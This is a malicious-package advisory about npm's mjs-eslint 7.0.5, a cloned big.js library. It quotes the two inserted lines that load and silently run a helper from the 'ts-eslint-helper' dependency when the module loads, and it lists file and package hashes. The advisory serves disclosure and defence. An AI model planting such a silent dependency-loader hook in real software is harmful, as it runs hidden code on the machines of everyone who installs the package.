MAL-2026-6223

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mjs-eslint/MAL-2026-6223.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6223

Published

2026-06-19T14:24:01Z

Modified

2026-06-19T15:47:26.704309403Z

Summary

Malicious code in mjs-eslint (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (51c6776509c718cebce5fe0ef0f5be73ede28f3be69888bfadff198f25ac2df6)

The package is published as 'mjs-eslint' but its description, file layout (big.js, big.mjs), and source are a verbatim copy of the legitimate big.js arbitrary-precision arithmetic library by Michael Mclaughlin. Two lines have been inserted into the IIFE at big.js:605-606 (and identically in big.mjs:605-606): const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. The corresponding dependency "ts-eslint-helper": "^4.0.1" is declared in package.json. This call fires at module load on any require('mjs-eslint') or import of the package, executes asynchronously, and silently swallows all errors via .catch(()=>{}). An arithmetic library has no legitimate reason to load a 'ts-eslint' helper at module init, and the name mismatch between the host package (mjs-eslint), the cloned library (big.js), and the dependency (ts-eslint-helper) is the canonical pattern of hiding the payload one hop away in a transitive dependency to evade scanners. Installer harm: any consumer who requires this package pulls in and executes whatever ts-eslint-helper's from_str() contains, with no visible signal.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "51c6776509c718cebce5fe0ef0f5be73ede28f3be69888bfadff198f25ac2df6",
            "source": "amazon-inspector",
            "modified_time": "2026-06-19T14:24:01Z",
            "versions": [
                "7.0.5"
            ],
            "id": "IN-MAL-2026-007069",
            "import_time": "2026-06-19T15:41:55.125964142Z"
        }
    ]
}

References

https://www.npmjs.com/package/mjs-eslint/v/7.0.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / mjs-eslint

Package

Name: mjs-eslint; View open source insights on deps.dev
Purl: pkg:npm/mjs-eslint

Affected ranges

Affected versions

7.*

7.0.5

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mjs-eslint/MAL-2026-6223.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "d1f1baf7ef7571122bd26e3676d6f2dcf7cc7fd7dc9cdec4c3b75535ad0e3bbf",
            "tlsh": "9cc2658c3ac67579593363788f465088eb38525712c8b286b4ae62b46f78cb107b4fdc",
            "path": "big.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-CZIfn7XIEayt52w8mrcnhaJb7vBKmmFH342KD2U0Uu71xMDg3YaoNNdY4EuLTrRLgyjo2i7sC2EvIKCFjP5AMA==",
                "sha1": "99641915c511c44eeb410b25e87f94ba00981b34"
            },
            "filename": "mjs-eslint-7.0.5.tgz"
        }
    ]
}